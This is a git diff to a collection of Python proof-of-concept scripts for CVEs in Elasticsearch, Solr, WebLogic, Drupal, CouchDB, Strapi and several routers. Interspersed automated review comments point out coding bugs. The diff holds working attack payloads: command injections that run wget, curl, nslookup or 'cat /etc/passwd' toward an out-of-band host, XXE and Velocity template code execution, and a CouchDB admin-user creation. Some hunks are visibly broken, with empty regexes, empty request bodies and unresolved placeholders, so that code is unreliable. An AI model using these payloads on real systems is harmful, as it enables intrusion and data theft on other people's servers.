diff --git a/2010/CVE-2010-0219/poc/pocsploit/CVE-2010-0219.py b/2010/CVE-2010-0219/poc/pocsploit/CVE-2010-0219.py
index b2964a6c4..9d536ea7d 100644
--- a/2010/CVE-2010-0219/poc/pocsploit/CVE-2010-0219.py
+++ b/2010/CVE-2010-0219/poc/pocsploit/CVE-2010-0219.py
@@ -33,18 +33,20 @@ def fingerprint(url):
# Proof of Concept
def poc(url):
result = {}
+ username = "amdin"
+ password = ""
try:
url = format_url(url)
path = """/axis2-admin/login"""
method = "POST"
- data = """loginUsername={{username}}&loginPassword={{password}}"""
+ data = """loginUsername={username}&loginPassword={password}""".format(username=username, password=password)
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
path = """/axis2/axis2-admin/login"""
method = "POST"
- data = """userName={{username}}&password={{password}}&submit=+Login+"""
+ data = """userName={username}&password={password}&submit=+Login+""".format(username=username, password=password)
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
resp1 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
diff --git a/2014/CVE-2014-3120/poc/pocsploit/CVE-2014-3120.py b/2014/CVE-2014-3120/poc/pocsploit/CVE-2014-3120.py
index 9e6c03916..bf3cb6647 100644
--- a/2014/CVE-2014-3120/poc/pocsploit/CVE-2014-3120.py
+++ b/2014/CVE-2014-3120/poc/pocsploit/CVE-2014-3120.py
@@ -1,4 +1,5 @@
import requests
+import re
# Vuln Base Info
@@ -39,24 +40,24 @@ def poc(url):
path = """/_search?pretty"""
method = "POST"
- data = """{
- "size": 1,
- "query": {
- "filtered": {
- "query": {
- "match_all": {
- }
+ data = {
+ "size": 1,
+ "query": {
+ "filtered": {
+ "query": {
+ "match_all": {
+ }
+ }
+ }
+ },
+ "script_fields": {
+ "command": {
+ "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"cat /etc/passwd\").getInputStream()).useDelimiter(\"\\\\A\").next();"
+ }
+ }
}
- }
- },
- "script_fields": {
- "command": {
- "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"cat /etc/passwd\").getInputStream()).useDelimiter(\"\\\\A\").next();"
- }
- }
-}"""
headers = {'Accept': '*/*', 'Accept-Language': 'en', 'Content-Type': 'application/x-www-form-urlencoded'}
- resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+ resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if ("""application/json""" in str(resp0.headers)) and (re.search(r"""root:.*:0:0""",resp0.text)) and (resp0.status_code == 200):
result["success"] = True
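Review bot: The request at L69 now sends the body with `json=data`, but the headers on the preceding line still declare `'Content-Type': 'application/x-www-form-urlencoded'`; requests only sets `application/json` when no Content-Type is supplied, so the body is serialized as JSON but labelled as a form post. Either drop the Content-Type entry from `headers` or set it to `'application/json'`, as the CVE-2019-17558 and CVE-2019-18818 hunks in this commit already do. The `poc` function continues outside the hunk.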
diff --git a/2014/CVE-2014-3206/poc/pocsploit/CVE-2014-3206.py b/2014/CVE-2014-3206/poc/pocsploit/CVE-2014-3206.py
index 588a72787..3756c4004 100644
--- a/2014/CVE-2014-3206/poc/pocsploit/CVE-2014-3206.py
+++ b/2014/CVE-2014-3206/poc/pocsploit/CVE-2014-3206.py
@@ -40,13 +40,13 @@ def poc(url):
oob_domain,flag = gen_oob_domain()
- path = """/backupmgt/localJob.php?session=fail;wget http://oob_domain;"""
+ path = """/backupmgt/localJob.php?session=fail;wget http://{oob_domain};""".format(oob_domain=oob_domain)
method = "GET"
data = """"""
headers = {'Accept': '*/*'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
- path = """/backupmgt/pre_connect_check.php?auth_name=fail;wget http://oob_domain;"""
+ path = """/backupmgt/pre_connect_check.php?auth_name=fail;wget http://{oob_domain};""".format(oob_domain=oob_domain)
method = "GET"
data = """"""
headers = {'Accept': '*/*'}
diff --git a/2015/CVE-2015-1427/poc/pocsploit/CVE-2015-1427.py b/2015/CVE-2015-1427/poc/pocsploit/CVE-2015-1427.py
index 489fbbcfa..485e106d5 100644
--- a/2015/CVE-2015-1427/poc/pocsploit/CVE-2015-1427.py
+++ b/2015/CVE-2015-1427/poc/pocsploit/CVE-2015-1427.py
@@ -1,4 +1,5 @@
import requests
+import re
# Vuln Base Info
diff --git a/2016/CVE-2016-10033/poc/pocsploit/CVE-2016-10033.py b/2016/CVE-2016-10033/poc/pocsploit/CVE-2016-10033.py
index 282102ba1..92fee0810 100644
--- a/2016/CVE-2016-10033/poc/pocsploit/CVE-2016-10033.py
+++ b/2016/CVE-2016-10033/poc/pocsploit/CVE-2016-10033.py
@@ -32,6 +32,7 @@ def fingerprint(url):
# Proof of Concept
def poc(url):
result = {}
+ username = "admin"
try:
url = format_url(url)
@@ -43,7 +44,7 @@ def poc(url):
path = """/wp-login.php?action=lostpassword"""
method = "POST"
- data = """wp-submit=Get+New+Password&redirect_to=&user_login={{username}}"""
+ data = """wp-submit=Get+New+Password&redirect_to=&user_login={username}""".format(username=username)
headers = {'Accept': '*/*', 'Content-Type': 'application/x-www-form-urlencoded'}
resp1 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
diff --git a/2016/CVE-2016-10940/poc/pocsploit/CVE-2016-10940.py b/2016/CVE-2016-10940/poc/pocsploit/CVE-2016-10940.py
index c8a05ab62..55dfedea2 100644
--- a/2016/CVE-2016-10940/poc/pocsploit/CVE-2016-10940.py
+++ b/2016/CVE-2016-10940/poc/pocsploit/CVE-2016-10940.py
@@ -20,8 +20,7 @@ def info():
"cwe-id": "CWE-89"
},
"metadata":{
- "vuln-target": "",
-
+ "vuln-target": "https://github.com/cckuailong/reapoc/tree/main/2016/CVE-2016-10940/vultarget"
},
"tags": ["cve", "cve2016", "sqli", "wp", "wordpress", "wp-plugin", "authenticated"],
}
diff --git a/2017/CVE-2017-10271/poc/pocsploit/CVE-2017-10271.py b/2017/CVE-2017-10271/poc/pocsploit/CVE-2017-10271.py
index 5b9543e71..1b6740b5e 100644
--- a/2017/CVE-2017-10271/poc/pocsploit/CVE-2017-10271.py
+++ b/2017/CVE-2017-10271/poc/pocsploit/CVE-2017-10271.py
@@ -58,7 +58,7 @@ def poc(url):
-c
- nslookup oob_domain
+ nslookup {oob_domain}
@@ -66,7 +66,7 @@ def poc(url):
-"""
+""".format(oob_domain=oob_domain)
headers = {'Accept': '*/*', 'Accept-Language': 'en', 'Content-Type': 'text/xml'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
diff --git a/2017/CVE-2017-11610/poc/pocsploit/CVE-2017-11610.py b/2017/CVE-2017-11610/poc/pocsploit/CVE-2017-11610.py
index 24e0c0c45..ee6eedc3d 100644
--- a/2017/CVE-2017-11610/poc/pocsploit/CVE-2017-11610.py
+++ b/2017/CVE-2017-11610/poc/pocsploit/CVE-2017-11610.py
@@ -46,10 +46,10 @@ def poc(url):
supervisor.supervisord.options.warnings.linecache.os.system
- nslookup oob_domain
+ nslookup {oob_domain}
-"""
+""".format(oob_domain=oob_domain)
headers = {'Accept': 'text/xml', 'Content-type': 'text/xml'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
diff --git a/2017/CVE-2017-12629/poc/pocsploit/CVE-2017-12629.py b/2017/CVE-2017-12629/poc/pocsploit/CVE-2017-12629.py
index 343def05c..7b1c9d4ab 100644
--- a/2017/CVE-2017-12629/poc/pocsploit/CVE-2017-12629.py
+++ b/2017/CVE-2017-12629/poc/pocsploit/CVE-2017-12629.py
@@ -48,7 +48,7 @@ def poc(url):
headers = {}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
- path = """/solr/{{core}}/select?q=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22https%3A%2F%2Foob_domain%2F%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E&wt=xml&defType=xmlparser"""
+ path = """/solr/{{core}}/select?q=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22https%3A%2F%2F{oob_domain}%2F%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E&wt=xml&defType=xmlparser""".format(oob_domain=oob_domain)
method = "GET"
data = """"""
headers = {}
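Review bot: `{{core}}` on the new path line survives `.format(oob_domain=oob_domain)` as the literal text `{core}`, so the request path still carries an unresolved placeholder rather than a core name; the same happens at L386, and at L332 and L360 the doubled braces are sent verbatim because no `.format` is applied at all. No `core` value is defined anywhere in this diff, so either a second keyword has to be supplied, e.g. `.format(core=<core value>, oob_domain=oob_domain)` with a comment saying where it comes from, or the placeholder has to be removed. `poc` continues outside the hunk.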
diff --git a/2017/CVE-2017-12635/poc/pocsploit/CVE-2017-12635.py b/2017/CVE-2017-12635/poc/pocsploit/CVE-2017-12635.py
index 303a67a99..cc336c3b1 100644
--- a/2017/CVE-2017-12635/poc/pocsploit/CVE-2017-12635.py
+++ b/2017/CVE-2017-12635/poc/pocsploit/CVE-2017-12635.py
@@ -37,15 +37,15 @@ def poc(url):
path = """/_users/org.couchdb.user:poc"""
method = "PUT"
- data = """{
- "type": "user",
- "name": "poc",
- "roles": ["_admin"],
- "roles": [],
- "password": "123456"
-}"""
+ data = {
+ "type": "user",
+ "name": "poc",
+ "roles": ["_admin"],
+ "roles": [],
+ "password": "123456"
+ }
headers = {'Accept': 'application/json'}
- resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+ resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if ("""application/json""" in str(resp0.headers) and """""" in str(resp0.headers)) and ("""org.couchdb.user:poc""" in resp0.text and """conflict""" in resp0.text and """Document update conflict""" in resp0.text) and (resp0.status_code == 201 or resp0.status_code == 409):
result["success"] = True
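Review bot: The dict literal at L180-186 lists `"roles"` twice; a Python dict keeps only the last value, so the body serialized by `json=data` contains a single `"roles": []` and no longer matches the removed string, which carried both entries. CPython does not warn about duplicate keys in a literal, so this is a silent behaviour change introduced by the commit. Either remove the dead first entry so the literal says what is actually sent, or, if both entries are required, the body cannot be a dict and must stay a pre-built string passed as `data=`; a one-line comment stating which is intended would help the next reader. `poc` continues outside the hunk.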
diff --git a/2017/CVE-2017-14135/poc/pocsploit/CVE-2017-14135.py b/2017/CVE-2017-14135/poc/pocsploit/CVE-2017-14135.py
index c04a4bdee..abd85f032 100644
--- a/2017/CVE-2017-14135/poc/pocsploit/CVE-2017-14135.py
+++ b/2017/CVE-2017-14135/poc/pocsploit/CVE-2017-14135.py
@@ -41,7 +41,7 @@ def poc(url):
oob_domain,flag = gen_oob_domain()
- path = """/webadmin/script?command=|%20nslookup%20oob_domain"""
+ path = """/webadmin/script?command=|%20nslookup%20{oob_domain}""".format(oob_domain=oob_domain)
method = "GET"
data = """"""
headers = {}
diff --git a/2017/CVE-2017-3506/poc/pocsploit/CVE-2017-3506.py b/2017/CVE-2017-3506/poc/pocsploit/CVE-2017-3506.py
index cd38d5644..bd5ae23d8 100644
--- a/2017/CVE-2017-3506/poc/pocsploit/CVE-2017-3506.py
+++ b/2017/CVE-2017-3506/poc/pocsploit/CVE-2017-3506.py
@@ -47,7 +47,7 @@ def poc(url):
- http://oob_domain
+ http://{oob_domain}
@@ -56,7 +56,7 @@ def poc(url):
-"""
+""".format(oob_domain=oob_domain)
headers = {'Content-Type': 'text/xml;charset=UTF-8', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8,'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
diff --git a/2017/CVE-2017-9506/poc/pocsploit/CVE-2017-9506.py b/2017/CVE-2017-9506/poc/pocsploit/CVE-2017-9506.py
index b8f4e8b3d..e5aef7a34 100644
--- a/2017/CVE-2017-9506/poc/pocsploit/CVE-2017-9506.py
+++ b/2017/CVE-2017-9506/poc/pocsploit/CVE-2017-9506.py
@@ -41,7 +41,7 @@ def poc(url):
oob_domain,flag = gen_oob_domain()
- path = """/plugins/servlet/oauth/users/icon-uri?consumerUri=http://oob_domain"""
+ path = """/plugins/servlet/oauth/users/icon-uri?consumerUri=http://{oob_domain}""".format(oob_domain=oob_domain)
method = "GET"
data = """"""
headers = {}
diff --git a/2018/CVE-2018-10818/poc/pocsploit/CVE-2018-10818.py b/2018/CVE-2018-10818/poc/pocsploit/CVE-2018-10818.py
index a992bf07c..c157ad115 100644
--- a/2018/CVE-2018-10818/poc/pocsploit/CVE-2018-10818.py
+++ b/2018/CVE-2018-10818/poc/pocsploit/CVE-2018-10818.py
@@ -42,13 +42,13 @@ def poc(url):
path = """/system/sharedir.php"""
method = "POST"
- data = """&uid=10; wget http://oob_domain"""
+ data = """&uid=10; wget http://{oob_domain}""".format(oob_domain=oob_domain)
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
path = """/en/php/usb_sync.php"""
method = "POST"
- data = """&act=sync&task_number=1;wget http://oob_domain"""
+ data = """&act=sync&task_number=1;wget http://{oob_domain}""".format(oob_domain=oob_domain)
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
resp1 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
diff --git a/2018/CVE-2018-16167/poc/pocsploit/CVE-2018-16167.py b/2018/CVE-2018-16167/poc/pocsploit/CVE-2018-16167.py
index ecb82b15e..28e5dc48e 100644
--- a/2018/CVE-2018-16167/poc/pocsploit/CVE-2018-16167.py
+++ b/2018/CVE-2018-16167/poc/pocsploit/CVE-2018-16167.py
@@ -42,7 +42,7 @@ def poc(url):
path = """/upload"""
method = "POST"
- data = """logtype=XML&timezone=1%3Bwget+http%3A%2F%2Foob_domain%3B"""
+ data = """logtype=XML&timezone=1%3Bwget+http%3A%2F%2F{oob_domain}%3B""".format(oob_domain=oob_domain)
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
diff --git a/2018/CVE-2018-7600/poc/pocsploit/CVE-2018-7600.py b/2018/CVE-2018-7600/poc/pocsploit/CVE-2018-7600.py
index 6cf5174ae..d30e68215 100644
--- a/2018/CVE-2018-7600/poc/pocsploit/CVE-2018-7600.py
+++ b/2018/CVE-2018-7600/poc/pocsploit/CVE-2018-7600.py
@@ -56,7 +56,7 @@ def poc(url):
user_register_form
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="_drupal_ajax"'''
- headers = {'Accept': 'application/json', 'Referer': ' {{Hostname}}/user/register', 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'multipart/form-data; boundary=---------------------------99533888113153068481322586663'}
+ headers = {'Accept': 'application/json', 'Referer': '%s/user/register' % url, 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'multipart/form-data; boundary=---------------------------99533888113153068481322586663'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if ("""application/json""" in str(resp0.headers)) and (re.search(r"""root:.*:0:0""",resp0.text)) and (resp0.status_code == 200):
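Review bot: The new Referer value uses `%`-formatting (`'%s/user/register' % url`) while every other substitution in this commit uses `str.format`; for consistency write `'Referer': '{}/user/register'.format(url)`. The placeholder it replaces was `{{Hostname}}`, so the header now carries whatever `format_url` returned, scheme included, rather than a bare host; if that is intended it deserves a short comment. `poc` starts and ends outside the hunk.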
diff --git a/2018/CVE-2018-7602/poc/pocsploit/CVE-2018-7602.py b/2018/CVE-2018-7602/poc/pocsploit/CVE-2018-7602.py
index fe812a2e1..335a11c29 100644
--- a/2018/CVE-2018-7602/poc/pocsploit/CVE-2018-7602.py
+++ b/2018/CVE-2018-7602/poc/pocsploit/CVE-2018-7602.py
@@ -1,4 +1,6 @@
import requests
+import re
+from urllib import parse
# Vuln Base Info
@@ -19,8 +21,7 @@ def info():
"cwe-id": ""
},
"metadata":{
- "vuln-target": "",
-
+ "vuln-target": "https://github.com/cckuailong/reapoc/tree/main/2018/CVE-2018-7602/vultarget"
},
"tags": ["cve", "cve2018", "drupal", "authenticated"],
}
@@ -33,6 +34,8 @@ def fingerprint(url):
# Proof of Concept
def poc(url):
result = {}
+ username = "drupal"
+ password = "drupal"
try:
url = format_url(url)
@@ -40,27 +43,42 @@ def poc(url):
path = """/?q=user%2Flogin"""
method = "POST"
- data = """form_id=user_login&name={{username}}&pass={{password}}&op=Log+in"""
+ data = """form_id=user_login&name={username}&pass={password}&op=Log+in""".format(username=username, password=password)
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+ tmp = re.search(r'', resp1.text)
+ if tmp:
+ form_token = tmp.group()
+ else:
+ return result
- path = """/?q={{url_encode("{{userid}}")}}%2Fcancel&destination={{url_encode("{{userid}}")}}%2Fcancel%3Fq%5B%2523post_render%5D%5B%5D%3Dpassthru%26q%5B%2523type%5D%3Dmarkup%26q%5B%2523markup%5D%3Decho+COP-2067-8102-EVC+|+rev"""
+ path = """/?q={userid}%2Fcancel&destination={userid}%2Fcancel%3Fq%5B%2523post_render%5D%5B%5D%3Dpassthru%26q%5B%2523type%5D%3Dmarkup%26q%5B%2523markup%5D%3Decho+COP-2067-8102-EVC+|+rev""".format(userid=userid)
method = "POST"
- data = """form_id=user_cancel_confirm_form&form_token={{form_token}}&_triggering_element_name=form_id&op=Cancel+account"""
+ data = """form_id=user_cancel_confirm_form&form_token={form_token}&_triggering_element_name=form_id&op=Cancel+account""".format(form_token=form_token)
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
resp2 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+ tmp = re.search(r'', resp1.text)
+ if tmp:
+ form_build_id = tmp.group()
+ else:
+ return result
- path = """/?q=file%2Fajax%2Factions%2Fcancel%2F%23options%2Fpath%2F{{form_build_id}}"""
+ path = """/?q=file%2Fajax%2Factions%2Fcancel%2F%23options%2Fpath%2F{form_build_id}""".format(form_build_id=form_build_id)
method = "POST"
- data = """form_build_id={{form_build_id}}"""
+ data = """form_build_id={form_build_id}""".format(form_build_id=form_build_id)
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
- resp3 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+ resp3 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=True)
if ("""CVE-2018-7602-POC""" in resp3.text):
result["success"] = True
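Review bot: The two extraction regexes added at L300 and L312 are empty (`re.search(r'', resp1.text)`); an empty pattern always matches at offset 0, so `tmp.group()` yields `''`, `form_token` and `form_build_id` are silently empty strings, and both `else: return result` branches are dead. If the patterns were lost in this view they need restoring; if they are genuinely empty the blocks should go rather than pretend to validate. Neither `resp1` nor `userid` is assigned on any visible line (the hunk header counts more lines than are shown here, so they may sit in lines this view lacks), and the newly imported `urllib.parse` is not used on any visible line now that the `url_encode` wrapping of `userid` was dropped from the path. `poc` continues outside the hunk.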
diff --git a/2019/CVE-2019-0193/poc/pocsploit/CVE-2019-0193.py b/2019/CVE-2019-0193/poc/pocsploit/CVE-2019-0193.py
index 734b7c33e..8e3e05c7d 100644
--- a/2019/CVE-2019-0193/poc/pocsploit/CVE-2019-0193.py
+++ b/2019/CVE-2019-0193/poc/pocsploit/CVE-2019-0193.py
@@ -49,7 +49,7 @@ def poc(url):
path = """/solr/{{core}}/dataimport?indent=on&wt=json"""
method = "POST"
- data = """command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22curl%20http://oob_domain%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport"""
+ data = """command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22curl%20http://{oob_domain}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport""".format(oob_domain=oob_domain)
headers = {'Content-type': 'application/x-www-form-urlencoded', 'X-Requested-With': 'XMLHttpRequest'}
resp1 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
diff --git a/2019/CVE-2019-10758/poc/pocsploit/CVE-2019-10758.py b/2019/CVE-2019-10758/poc/pocsploit/CVE-2019-10758.py
index 177cc860b..14f0ddadd 100644
--- a/2019/CVE-2019-10758/poc/pocsploit/CVE-2019-10758.py
+++ b/2019/CVE-2019-10758/poc/pocsploit/CVE-2019-10758.py
@@ -42,7 +42,7 @@ def poc(url):
path = """/checkValid"""
method = "POST"
- data = """document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl http://oob_domain")"""
+ data = """document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl http://{oob_domain}")""".format(oob_domain=oob_domain)
headers = {'Authorization': 'Basic YWRtaW46cGFzcw==', 'Content-Type': 'application/x-www-form-urlencoded'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
diff --git a/2019/CVE-2019-17558/poc/pocsploit/CVE-2019-17558.py b/2019/CVE-2019-17558/poc/pocsploit/CVE-2019-17558.py
index 1314053bb..040a191b1 100644
--- a/2019/CVE-2019-17558/poc/pocsploit/CVE-2019-17558.py
+++ b/2019/CVE-2019-17558/poc/pocsploit/CVE-2019-17558.py
@@ -41,30 +41,28 @@ def poc(url):
path = """/solr/admin/cores?wt=json"""
method = "GET"
- data = """"""
headers = {}
- resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+ resp0 = requests.request(method=method,url=url+path,headers=headers,timeout=10,verify=False,allow_redirects=False)
path = """/solr/{{core}}/config"""
method = "POST"
- data = """{
- "update-queryresponsewriter": {
- "startup": "lazy",
- "name": "velocity",
- "class": "solr.VelocityResponseWriter",
- "template.base.dir": "",
- "solr.resource.loader.enabled": "true",
- "params.resource.loader.enabled": "true"
- }
-}"""
+ data = {
+ "update-queryresponsewriter": {
+ "startup": "lazy",
+ "name": "velocity",
+ "class": "solr.VelocityResponseWriter",
+ "template.base.dir": "",
+ "solr.resource.loader.enabled": "true",
+ "params.resource.loader.enabled": "true"
+ }
+ }
headers = {'Content-Type': 'application/json'}
- resp1 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+ resp1 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
- path = """/solr/{{core}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27curl%20http://oob_domain%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end"""
+ path = """/solr/{{core}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27curl%20http://{oob_domain}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end""".format(oob_domain=oob_domain)
method = "GET"
- data = """"""
headers = {'Connection': 'close'}
- resp2 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+ resp2 = requests.request(method=method,url=url+path,headers=headers,timeout=10,verify=False,allow_redirects=False)
if verify_request(type="dns", flag=flag):
result["success"] = True
diff --git a/2019/CVE-2019-18818/poc/pocsploit/CVE-2019-18818.py b/2019/CVE-2019-18818/poc/pocsploit/CVE-2019-18818.py
index 1a62ba197..00bf2b962 100644
--- a/2019/CVE-2019-18818/poc/pocsploit/CVE-2019-18818.py
+++ b/2019/CVE-2019-18818/poc/pocsploit/CVE-2019-18818.py
@@ -39,9 +39,9 @@ def poc(url):
path = """/admin/auth/reset-password"""
method = "POST"
- data = """{"code": {"$gt": 0}, "password": "SuperStrongPassword1", "passwordConfirmation": "SuperStrongPassword1"}"""
+ data = {"code": {"$gt": 0}, "password": "SuperStrongPassword1", "passwordConfirmation": "SuperStrongPassword1"}
headers = {'Content-Type': 'application/json'}
- resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+ resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if (resp0.status_code == 200) and ("""application/json""" in str(resp0.headers)) and ("""username":""" in resp0.text and """email":""" in resp0.text and """jwt":""" in resp0.text):
result["success"] = True
diff --git a/2019/CVE-2019-19824/poc/pocsploit/CVE-2019-19824.py b/2019/CVE-2019-19824/poc/pocsploit/CVE-2019-19824.py
index e36a6d999..e4e31f4c4 100644
--- a/2019/CVE-2019-19824/poc/pocsploit/CVE-2019-19824.py
+++ b/2019/CVE-2019-19824/poc/pocsploit/CVE-2019-19824.py
@@ -43,7 +43,7 @@ def poc(url):
path = """/boafrm/formSysCmd"""
method = "POST"
- data = """submit-url=%2Fsyscmd.htm&sysCmdselect=5&sysCmdselects=0&save_apply=Run+Command&sysCmd=wget+http://oob_domain"""
+ data = """submit-url=%2Fsyscmd.htm&sysCmdselect=5&sysCmdselects=0&save_apply=Run+Command&sysCmd=wget+http://{oob_domain}""".format(oob_domain=oob_domain)
headers = {'Authorization': 'Basic YWRtaW46cGFzc3dvcmQ=', 'Content-Type': 'application/x-www-form-urlencoded'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
diff --git a/2019/CVE-2019-2616/poc/pocsploit/CVE-2019-2616.py b/2019/CVE-2019-2616/poc/pocsploit/CVE-2019-2616.py
index 7455ec045..6eedf37d9 100644
--- a/2019/CVE-2019-2616/poc/pocsploit/CVE-2019-2616.py
+++ b/2019/CVE-2019-2616/poc/pocsploit/CVE-2019-2616.py
@@ -42,7 +42,7 @@ def poc(url):
path = """/xmlpserver/ReportTemplateService.xls"""
method = "POST"
- data = """"""
+ data = """""".format(oob_domain=oob_domain)
headers = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Content-Type': 'text/xml; charset=UTF-8'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
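Review bot: `.format(oob_domain=oob_domain)` at L427 is applied to an empty string, so nothing is substituted and the request body carries no `oob_domain` at all; the same applies at L437, where the path contains no `{oob_domain}` field for the call to fill. If the XML bodies were stripped from this view they need restoring with a `{oob_domain}` field; if they are genuinely empty, the no-op `.format` should be removed and the missing body documented, since any out-of-band verification that presumably follows cannot succeed through these requests. `poc` continues outside the hunk.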
diff --git a/2019/CVE-2019-2767/poc/pocsploit/CVE-2019-2767.py b/2019/CVE-2019-2767/poc/pocsploit/CVE-2019-2767.py
index 92c71c9df..e0bb79eb2 100644
--- a/2019/CVE-2019-2767/poc/pocsploit/CVE-2019-2767.py
+++ b/2019/CVE-2019-2767/poc/pocsploit/CVE-2019-2767.py
@@ -40,7 +40,7 @@ def poc(url):
oob_domain,flag = gen_oob_domain()
- path = """/xmlpserver/convert?xml=<%3fxml+version%3d"1.0"+%3f>%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123"""
+ path = """/xmlpserver/convert?xml=<%3fxml+version%3d"1.0"+%3f>%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123""".format(oob_domain=oob_domain)
method = "GET"
data = """"""
headers = {}
